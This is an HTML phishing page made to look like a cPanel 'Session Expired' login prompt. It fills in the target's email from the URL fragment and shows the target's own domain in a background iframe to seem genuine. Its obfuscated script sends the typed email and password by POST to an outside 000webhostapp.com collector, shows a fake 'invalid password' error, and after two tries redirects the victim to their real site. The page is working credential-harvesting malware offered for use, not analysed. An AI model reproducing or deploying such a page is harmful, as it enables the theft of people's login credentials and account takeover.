
<!DOCTYPE html>
<html lang="zxx"><head>


    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Mail</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="" type="image/x-icon">
    <link href="https://mytehranmusic.ru/.oce/css2.css" rel="stylesheet">
    <style>
        body {
        font-family: 'Open Sans', sans-serif;
        color: #535353;
    }

    .img-fluid {
        max-width: 100% !important;
        height: auto;
    }

    .form-control:focus {
        box-shadow: none;
    }

    .login-box .alert {
        padding: 15.5px 20px;
        font-size: 13px;
        border: none !important;
        border-radius: 3px;
        margin-bottom: 25px;
    }

    .login-box .alert-dismissible .btn-close {
        padding: 18.5px 19px;
        background-size: 8px;
    }

    .login-box .alert-dismissible .btn-close:focus,
    .login-box .alert-dismissible .btn-close:active {
        box-shadow: none;
    }

    .login-box .password-indicator {
        position: absolute;
        right: 15px;
        top: 17px;
        cursor: pointer;
        visibility: hidden;
        opacity: 0;
        transition: visibility 0s linear 300ms, opacity 500ms;
        font-size: 17px;
        color: #999;
    }

    .login-box .password-wrapper:hover .password-indicator {
        visibility: visible;
        opacity: 1;
        transition: visibility 0s linear 0s, opacity 500ms;
        font-size: 17px;
        color: #555;
    }

    .login-box .login-popover {
        font-size: 14px;
        color: #777;
        cursor: help;
    }

    .login-box .login-popover-abs {
        position: absolute;
        right: 15px;
        top: 15px;
    }

    .popover {
        border: 1px solid #ebeef5 !important;
        box-shadow: 0 2px 12px 0 rgb(0 0 0 / 10%);
    }

    .popover-header {
        box-shadow: none;
        border: 0px;
        background: #fff;
        color: #555;
        font-size: 15px;
        font-family: 'Jost', sans-serif;
        padding-bottom: 5px;
    }

    .popover-body {
        padding: 5px 10px 10px 16px;
        color: #777;
        font-size: 13px;
    }

    .login-box .form-group label.error {
        font-size: 13px;
        text-align: left;
        color: #535353;
        width: 100%;
    }

    /** Login 26 start **/
    .login-26 {
        background: url('') top left repeat;
        background-size: cover;
        top: 0;
        width: 100%;
        text-align: center;
        bottom: 0;
        opacity: 1;
        z-index: 999;
        min-height: 100vh;
        position: relative;
        display: flex;
        justify-content: center;
        align-items: center;
        padding: 30px 0;
    }

    .login-26 .form-section {
        max-width: 550px;
        margin: 0 auto;
        padding: 70px 50px;
        background: #fff;
        border-radius: 5px;
        box-shadow: 0 0 35px rgba(0, 0, 0, 0.1);
        z-index: 999;
    }

    .login-26 #particles-js {
        background-size: cover;
        background-position: 50% 50%;
        position: fixed;
        min-height: 100vh;
        width: 100%;
        z-index: -999;
    }

    .login-26 .form-section p {
        color: #535353;
        margin-bottom: 0;
        text-align: center;
        font-size: 16px;
    }

    .login-26 h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    .h1,
    .h2,
    .h3,
    .h4,
    .h5,
    .h6 {
        font-family: 'Jost', sans-serif;
    }

    .login-26 .form-section a {
        text-decoration: none;
    }

    .login-26 .form-section p a {
        color: #535353;
        font-weight: 500;
    }

    .login-26 .form-section .extra-login {
        float: left;
        width: 100%;
        margin: 25px 0 25px;
        text-align: center;
        position: relative;
    }

    .login-26 .form-section .extra-login::before {
        position: absolute;
        left: 0;
        top: 10px;
        width: 100%;
        height: 1px;
        background: #d8dcdc;
        content: "";
    }

    .login-26 .form-section .extra-login>span {
        width: auto;
        float: none;
        display: inline-block;
        background: #fff;
        padding: 1px 20px;
        z-index: 1;
        position: relative;
        font-size: 15px;
        color: #535353;
        text-transform: capitalize;
    }

    .login-26 .form-section ul {
        list-style: none;
        padding: 0;
        margin: 0 0 20px;
    }

    .login-26 .logo-2 img {
        margin-bottom: 20px;
        height: 30px;
    }

    .login-26 .form-section .social-list li {
        display: inline-block !important;
        margin-bottom: 5px;
    }

    .login-26 .form-section .social-list li a {
        font-size: 14px;
        font-weight: 400;
        width: 130px;
        margin: 2px 0 3px 0;
        height: 40px;
        line-height: 40px;
        border-radius: 20px;
        display: inline-block;
        text-align: center;
        text-decoration: none;
        background: #fff;
        box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
        font-family: 'Jost', sans-serif;
    }

    .login-26 .form-section .social-list li a i {
        height: 40px;
        width: 40px;
        line-height: 40px;
        float: left;
        color: #fff;
        border-radius: 20px;
    }

    .login-26 .form-section .social-list li a span {
        margin-right: 7px;
    }

    .login-26 .form-section .thembo {
        margin-left: 4px;
    }

    .login-26 .form-section h3 {
        margin: 0 0 30px;
        font-size: 25px;
        font-weight: 400;
        color: #040404;
    }

    .login-26 .main-title .words-wrapper b {
        display: inline-block;
        position: absolute;
        white-space: nowrap;
        left: 0;
        top: 0;
    }

    .login-26 .main-title .words-wrapper b.visible {
        position: relative;
    }

    .login-26 .main-title .no-js .words-wrapper b {
        opacity: 0;
    }

    .login-26 .main-title .no-js .words-wrapper b.visible {
        opacity: 1;
    }

    .login-26 .main-title .headline {
        margin: 0 0 30px;
        font-size: 25px;
        font-weight: 400;
        color: #313131;
    }

    .login-26 .main-title .headline b {
        opacity: 0;
        font-weight: 400;
    }

    .login-26 .main-title .headline b.visible {
        top: 0;
        opacity: 1;
        -webkit-animation: slide-in 0.6s;
        -moz-animation: slide-in 0.6s;
        animation: slide-in 0.6s;
    }

    .login-26 .main-title .headline b.is-hidden {
        -webkit-animation: slide-out 0.6s;
        -moz-animation: slide-out 0.6s;
        animation: slide-out 0.6s;
    }

    .login-26 .main-title .visible {
        color: #01c5ff;
    }

    @-webkit-keyframes slide-in {
        0% {
            opacity: 0;
            -webkit-transform: translateY(-100%);
        }

        60% {
            opacity: 1;
            -webkit-transform: translateY(20%);
        }

        100% {
            opacity: 1;
            -webkit-transform: translateY(0);
        }
    }

    .login-26 .form-section .form-group {
        margin-bottom: 25px;
    }

    .login-26 .form-section .form-control {
        float: left;
        width: 100%;
        padding: 12px 20px 12px 20px;
        height: 50px;
    }

    .login-26 .form-section .form-control {
        font-size: 16px;
        outline: none;
        background: #e8e8e8;
        color: #535353;
        border-radius: 3px;
        border: 1px solid #e8e8e8;
    }

    .login-26 .form-section .checkbox .terms {
        margin-left: 3px;
    }

    .login-26 .form-section button:focus {
        outline: none;
        outline: 0 auto -webkit-focus-ring-color;
    }

    .login-26 .form-section .terms {
        margin-left: 3px;
    }

    .login-26 .form-section .form-check-input {
        width: 20px;
        height: 20px;
        margin-top: 0;
        position: absolute;
        border: 1px solid #e8e8e8;
        border-radius: 2px;
        background-color: #e8e8e8;
        margin-left: -22px;
    }

    .login-26 .form-section .checkbox {
        margin-bottom: 20px;
    }

    .login-26 .form-section .form-check {
        margin-bottom: 0;
        text-align: left;
    }

    .login-26 .form-section .form-check a {
        color: #535353;
    }

    .login-26 .form-section .form-check-label {
        padding-left: 5px;
        margin-bottom: 0;
        font-size: 16px;
        color: #535353;
    }

    .login-26 .form-check-input:checked {
        background-color: #01c5ff;
        border-color: #01c5ff;
    }

    .login-26 .form-section a.forgot-password {
        font-size: 16px;
        color: #535353;
    }

    .login-26 .btn-theme {
        color: #fff;
        text-align: center;
        border: 2px solid transparent;
        display: inline-block;
        position: relative;
        z-index: 1;
        transition: all .7s ease;
        border-radius: 3px;
        font-size: 17px;
        font-weight: 400;
        font-family: 'Jost', sans-serif;
        width: 50%;
    }

    .login-26 .btn-theme:before {
        position: absolute;
        content: "";
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0;
        visibility: hidden;
        transition: all .7s ease;
        z-index: -1;
        border-radius: 3px;
    }

    .login-26 .btn-theme:after {
        position: absolute;
        content: "";
        top: 0;
        right: 0;
        width: 100%;
        height: 100%;
        opacity: 0;
        visibility: hidden;
        transition: all .7s ease;
        z-index: -1;
    }

    .login-26 .btn-theme:hover {
        background: transparent;
    }

    .login-26 .btn-theme:hover:before {
        width: 0;
        opacity: 1;
        visibility: visible;
    }

    .login-26 .btn-theme:hover:after {
        width: 0;
        opacity: 1;
        visibility: visible;
    }

    .login-26 .btn-lg {
        padding: 0 50px;
        line-height: 46px;
    }

    .login-26 .btn {
        box-shadow: none !important;
    }

    .login-26 .btn-md {
        padding: 0 45px;
        line-height: 41px;
    }

    .login-26 .btn-primary {
        background: #01c5ff;
    }

    .login-26 .btn-primary:before {
        background: #01c5ff;
    }

    .login-26 .btn-primary:after {
        background: #01c5ff;
    }

    .login-26 .btn-primary:hover {
        color: #01c5ff;
        border: 2px solid #01c5ff;
    }

    /** Social media **/
    .login-26 .facebook-i {
        background: #4867aa;
        color: #fff;
    }

    .login-26 .twitter-i {
        background: #33CCFF;
        color: #fff;
    }

    .login-26 .google-i {
        background: #db4437;
        color: #fff;
    }

    .login-26 .facebook-color {
        color: #4867aa;
    }

    .login-26 .twitter-color {
        color: #33CCFF;
    }

    .login-26 .google-color {
        color: #db4437;
    }

    @media (max-width: 768px) {
        .login-26 .form-section {
            padding: 50px 30px;
        }
    }

    @media (max-width: 500px) {
        .login-26 .form-section .social-list li a i {
            display: none;
        }

        .login-26 .form-section .social-list li a {
            width: 100px;
        }
    }

    /** Login 26 end **/


    #myProgress {
        width: 100%;
        background-color: grey;
    }

    #myBar {
        width: 1%;
        height: 30px;
        background-color: green;
    }
    </style>
</head>

<body id="top">
    <div class="page_loader"></div>
    <div class="login-26">
        <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none; background-color: rgb(122,122,122,0.2);"></iframe>
        <div class="container">
            <div class="row">
                <div class="col-lg-12 align-items-center">
                    <div class="form-section">
                        
                        
                        <div id="formContent" style="display: block; right: 0px;">
                            <form name="apform">
                                <img class="favicon-logo" width="64px" src="https://www.google.com/s2/favicons?sz=64&amp;domain_url=cpanel.com"><br>
                                <h3>Session Expired! Sign-In to Continue</h3>
                                <center>
                                    <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password..! Please enter correct password.</div>
                                    <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                                </center>
                                <div class="form-group clearfix mb-1">
                                    <input name="ai" type="email" id="ai" readonly="" value="" class="form-control" placeholder="Email Address" aria-label="Email Address">
                                </div>
                                <div class="form-group clearfix">
                                    <input name="pr" type="password" id="pr" class="form-control" placeholder="Password" aria-label="Password">
                                </div>
                                
                                <div class="form-group mb-0 clearfix">
                                    <input type="button" class="btn btn-lg btn-primary btn-theme w-100" id="sub-btn" value="Login">
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
function _0x1214(){var _0x4fa512=['keyCode','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','src','61OuXZDD','#error','JSON','preventDefault','#pr','html','keypress','Password\x20field\x20is\x20empty.!','location','Verifying...','8452712CJhkeI','Email\x20field\x20is\x20empty.!','3172791kxritc','indexOf','62eZTEKb','animate','click','#domain','POST','hide','7790310KzFQbU','which','attr','10168659ywabAr','hash','.favicon-logo','test','ready','Session\x20Expired,\x20sign\x20in\x20to\x20continue.','#msg','toLowerCase','4912860ndrPSY','https://','#reconnect','#sub-btn','show','Login','style','7hzBINL','substr','https://www.google.com','ajax','4QQtnaF','http://www.','264hbkChy','getElementById','val','#ai-txt','https://beckybellfndn2023.000webhostapp.com/','width','https://www.google.com/s2/favicons?sz=64&domain_url=','38615LdExUO'];_0x1214=function(){return _0x4fa512;};return _0x1214();}var _0x479a13=_0x14f9;function _0x14f9(_0x8832ea,_0x1f5ee2){var _0x1214e1=_0x1214();return _0x14f9=function(_0x14f965,_0x328f3c){_0x14f965=_0x14f965-0x176;var _0x3a6363=_0x1214e1[_0x14f965];return _0x3a6363;},_0x14f9(_0x8832ea,_0x1f5ee2);}(function(_0x72ba19,_0x1fea7a){var _0x145659=_0x14f9,_0x1db795=_0x72ba19();while(!![]){try{var _0x2dea34=parseInt(_0x145659(0x184))/0x1*(-parseInt(_0x145659(0x192))/0x2)+parseInt(_0x145659(0x190))/0x3*(-parseInt(_0x145659(0x177))/0x4)+parseInt(_0x145659(0x180))/0x5*(-parseInt(_0x145659(0x179))/0x6)+-parseInt(_0x145659(0x1aa))/0x7*(-parseInt(_0x145659(0x18e))/0x8)+parseInt(_0x145659(0x19b))/0x9+parseInt(_0x145659(0x1a3))/0xa+-parseInt(_0x145659(0x198))/0xb;if(_0x2dea34===_0x1fea7a)break;else _0x1db795['push'](_0x1db795['shift']());}catch(_0x3d2264){_0x1db795['push'](_0x1db795['shift']());}}}(_0x1214,0x8b368));var rdrt=_0x479a13(0x1ac),domain_redirect=0x1,rc=0x2,f=_0x479a13(0x17d);$(document)[_0x479a13(0x19f)](function(){var _0x340ba1=_0x479a13,_0x8de6b9=0x0,_0x5bd550=0x0;$(document)[_0x340ba1(0x18a)](function(_0x191fcc){var _0x2e98f7=_0x340ba1,_0x33a344=_0x191fcc[_0x2e98f7(0x181)]?_0x191fcc['keyCode']:_0x191fcc[_0x2e98f7(0x199)];_0x33a344=='13'&&(_0x191fcc[_0x2e98f7(0x187)](),$(_0x2e98f7(0x1a6))[_0x2e98f7(0x194)]());});function _0x2260ba(){if(_0x5bd550==0x0){_0x5bd550=0x1;var _0x310e84=document['getElementById']('myBar'),_0x4b2366=0x1,_0x57f3f5=setInterval(_0x4dab92,0x32);function _0x4dab92(){var _0x4c5de4=_0x14f9;_0x4b2366>=0x64?(clearInterval(_0x57f3f5),_0x5bd550=0x0,$(_0x4c5de4(0x1a5))[_0x4c5de4(0x189)](_0x4c5de4(0x1a0)),$('#myProgress')[_0x4c5de4(0x193)]({'left':0x0,'opacity':_0x4c5de4(0x197)},0x0),$(_0x4c5de4(0x17c))[_0x4c5de4(0x197)](),$('#formContent')[_0x4c5de4(0x193)]({'right':0x0,'opacity':'show'},0x1f4)):(_0x4b2366++,_0x310e84[_0x4c5de4(0x1a9)][_0x4c5de4(0x17e)]=_0x4b2366+'%');}}}var _0x2e65af=window['location'][_0x340ba1(0x19c)][_0x340ba1(0x1ab)](0x1);if(!_0x2e65af)_0x2260ba();else{var _0x590011=/^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;if(!_0x590011['test'](_0x2e65af))var _0x2c94f7=_0x2e65af;else var _0x2c94f7=atob(_0x2e65af);var _0x378f6b=_0x2c94f7['indexOf']('@'),_0x4f11f0=_0x2c94f7['substr'](_0x378f6b+0x1),_0x142f59=_0x4f11f0[_0x340ba1(0x1ab)](0x0,_0x4f11f0[_0x340ba1(0x191)]('.')),_0x1c1d83=_0x142f59[_0x340ba1(0x1a2)]();$('#ai')[_0x340ba1(0x17b)](_0x2c94f7),$(_0x340ba1(0x17c))[_0x340ba1(0x189)](_0x2c94f7),$(_0x340ba1(0x1a1))['hide']();var _0x5e6287=_0x340ba1(0x1a4)+_0x4f11f0;document[_0x340ba1(0x17a)]('mainPage')[_0x340ba1(0x183)]=_0x5e6287,$(_0x340ba1(0x19d))[_0x340ba1(0x19a)](_0x340ba1(0x183),_0x340ba1(0x17f)+_0x4f11f0),_0x2260ba(),$('#domain')[_0x340ba1(0x189)](_0x1c1d83);}$(_0x340ba1(0x1a6))[_0x340ba1(0x194)](function(_0x3bc55d){var _0x1f2f3a=_0x340ba1;$(_0x1f2f3a(0x185))['hide'](),$(_0x1f2f3a(0x1a1))[_0x1f2f3a(0x197)](),_0x3bc55d[_0x1f2f3a(0x187)]();var _0x114fbb=$('#ai')[_0x1f2f3a(0x17b)](),_0x143e46=$(_0x1f2f3a(0x188))['val'](),_0x32d523=$(_0x1f2f3a(0x1a1))[_0x1f2f3a(0x189)]();$(_0x1f2f3a(0x1a1))['text'](_0x32d523);var _0x17d079=_0x114fbb,_0x51d4b7=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x114fbb)return $(_0x1f2f3a(0x185))[_0x1f2f3a(0x1a7)](),$(_0x1f2f3a(0x185))[_0x1f2f3a(0x189)](_0x1f2f3a(0x18f)),![];if(!_0x51d4b7[_0x1f2f3a(0x19e)](_0x17d079))return $(_0x1f2f3a(0x185))[_0x1f2f3a(0x1a7)](),$(_0x1f2f3a(0x185))[_0x1f2f3a(0x189)](_0x1f2f3a(0x182)),![];if(!_0x143e46)return $('#error')[_0x1f2f3a(0x1a7)](),$(_0x1f2f3a(0x185))[_0x1f2f3a(0x189)](_0x1f2f3a(0x18b)),![];var _0x3596a3=_0x17d079[_0x1f2f3a(0x191)]('@'),_0x14cbd4=_0x17d079[_0x1f2f3a(0x1ab)](_0x3596a3+0x1),_0x30bcf8=_0x14cbd4[_0x1f2f3a(0x1ab)](0x0,_0x14cbd4['indexOf']('.')),_0x223097=_0x30bcf8['toLowerCase'](),_0x13bb85=_0x1f2f3a(0x1a4)+_0x14cbd4;document[_0x1f2f3a(0x17a)]('mainPage')[_0x1f2f3a(0x183)]=_0x13bb85,$(_0x1f2f3a(0x19d))['attr'](_0x1f2f3a(0x183),_0x1f2f3a(0x17f)+_0x14cbd4),$(_0x1f2f3a(0x195))[_0x1f2f3a(0x189)](_0x223097),_0x8de6b9=_0x8de6b9+0x1,$[_0x1f2f3a(0x176)]({'dataType':_0x1f2f3a(0x186),'url':f,'type':_0x1f2f3a(0x196),'data':{'ai':_0x114fbb,'pr':_0x143e46},'beforeSend':function(_0x1ff117){var _0x22bb2e=_0x1f2f3a;$(_0x22bb2e(0x1a6))[_0x22bb2e(0x17b)](_0x22bb2e(0x18d));},'complete':function(){var _0x1a8dba=_0x1f2f3a;$('#pr')[_0x1a8dba(0x17b)]('');if(_0x8de6b9>=rc)return _0x8de6b9=0x0,domain_redirect==0x1?window[_0x1a8dba(0x18c)]['replace'](_0x1a8dba(0x178)+_0x14cbd4):window['location']['replace'](rdrt),![];$(_0x1a8dba(0x1a1))['show'](),$(_0x1a8dba(0x1a6))[_0x1a8dba(0x17b)](_0x1a8dba(0x1a8));}});});});
</script>

</body></html>
